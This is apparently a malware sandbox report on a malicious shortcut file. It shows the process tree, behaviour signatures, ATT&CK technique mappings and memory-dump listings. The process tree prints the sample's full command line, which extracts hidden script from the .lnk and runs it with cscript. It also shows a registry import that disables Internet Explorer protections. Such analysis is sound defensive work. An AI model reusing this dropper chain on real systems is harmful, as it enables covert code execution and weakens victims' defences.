PID 968 wrote to memory of 1800	968	cmd.exe	44
PID 968 wrote to memory of 1800	968	cmd.exe	44
PID 968 wrote to memory of 1800	968	cmd.exe	44
PID 968 wrote to memory of 1800	968	cmd.exe	44
PID 968 wrote to memory of 1800	968	cmd.exe	44
PID 968 wrote to memory of 1800	968	cmd.exe	44
PID 808 wrote to memory of 2024	808	iexplore.exe	46
PID 808 wrote to memory of 2024	808	iexplore.exe	46
PID 808 wrote to memory of 2024	808	iexplore.exe	46
PID 808 wrote to memory of 2024	808	iexplore.exe	46
PID 808 wrote to memory of 720	808	iexplore.exe	51
PID 808 wrote to memory of 720	808	iexplore.exe	51
PID 808 wrote to memory of 720	808	iexplore.exe	51
PID 808 wrote to memory of 720	808	iexplore.exe	51

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
1532	attrib.exe

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\0713c5c3db572d88b08d527533cb07d25d33c1c7535cf59075e693b4fefba1fc.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:2044
- C:\WINDOWS\system32\cmd.exe
  "C:\WINDOWS\system32\cmd.exe" /c copy 2*.lnk C:\Users\Admin\AppData\Local\Temp&C:&cd C:\Users\Admin\AppData\Local\Temp&attrib +r *.lnk&for /f "delims=" %a in ('dir /s /b *.LnK') do type "%~fa" | find "p0b2x6">.js &CsCRipt .js "%~fa"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1552
- - C:\Windows\system32\attrib.exe
    attrib +r *.lnk
    3⤵
    - Views/modifies file attributes
    PID:1532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir /s /b *.LnK
    3⤵
    PID:1576
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" type "C:\Users\Admin\AppData\Local\Temp\0713c5c3db572d88b08d527533cb07d25d33c1c7535cf59075e693b4fefba1fc.lnk" "
    3⤵
    PID:1264
- - C:\Windows\system32\find.exe
    find "p0b2x6"
    3⤵
    PID:1360
- - C:\Windows\system32\cscript.exe
    CsCRipt .js "C:\Users\Admin\AppData\Local\Temp\0713c5c3db572d88b08d527533cb07d25d33c1c7535cf59075e693b4fefba1fc.lnk"
    3⤵
    - Deletes itself
    - Suspicious use of WriteProcessMemory
    PID:1708
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c 200_Germany.csv
      4⤵
      Suspicious use of WriteProcessMemory
      PID:968
    - - C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
        
        "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde
        5⤵
        Enumerates system info in registry
        Modifies Internet Explorer settings
        Modifies registry class
        Suspicious behavior: AddClipboardFormatListener
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        
        PID:1800
  - - C:\Windows\System32\cscript.exe
      "C:\Windows\System32\cscript.exe" C:\Users\Admin\AppData\Local\Microsoft\PackageCache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}\file.js
      4⤵
      Suspicious use of WriteProcessMemory
      PID:564
    - - C:\Windows\System32\cscript.exe
        
        "C:\Windows\System32\cscript.exe" C:\Users\Admin\AppData\Local\Microsoft\PackageCache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}\kill.js
        5⤵
        
        PID:1164
    - - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" import C:\Users\Admin\AppData\Local\Microsoft\PackageCache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}\g3r.reg
        5⤵
        Modifies Internet Explorer Automatic Crash Recovery
        Modifies Internet Explorer Phishing Filter
        Modifies Internet Explorer Protected Mode
        Modifies Internet Explorer Protected Mode Banner
        Modifies Internet Explorer settings
        
        PID:1260

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:808
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:808 CREDAT:275457 /prefetch:2
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  PID:2024
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:808 CREDAT:1717252 /prefetch:2
  2⤵
  - Suspicious use of SetWindowsHookEx
  PID:720

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Privilege Escalation

Defense Evasion

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/968-67-0x0000000002690000-0x0000000002691000-memory.dmp

Filesize
4KB

Download
memory/1800-63-0x000000002F941000-0x000000002F944000-memory.dmp

Filesize
12KB

Download
memory/1800-64-0x0000000070F21000-0x0000000070F23000-memory.dmp

Filesize
8KB

Download
memory/1800-65-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1800-66-0x0000000075AC1000-0x0000000075AC3000-memory.dmp

Filesize
8KB

Download
memory/1800-68-0x000000006A801000-0x000000006A803000-memory.dmp

Filesize
8KB

Download
memory/1800-69-0x000000006A411000-0x000000006A413000-memory.dmp

Filesize
8KB

Download
memory/1800-74-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2044-55-0x000007FEFB731000-0x000007FEFB733000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads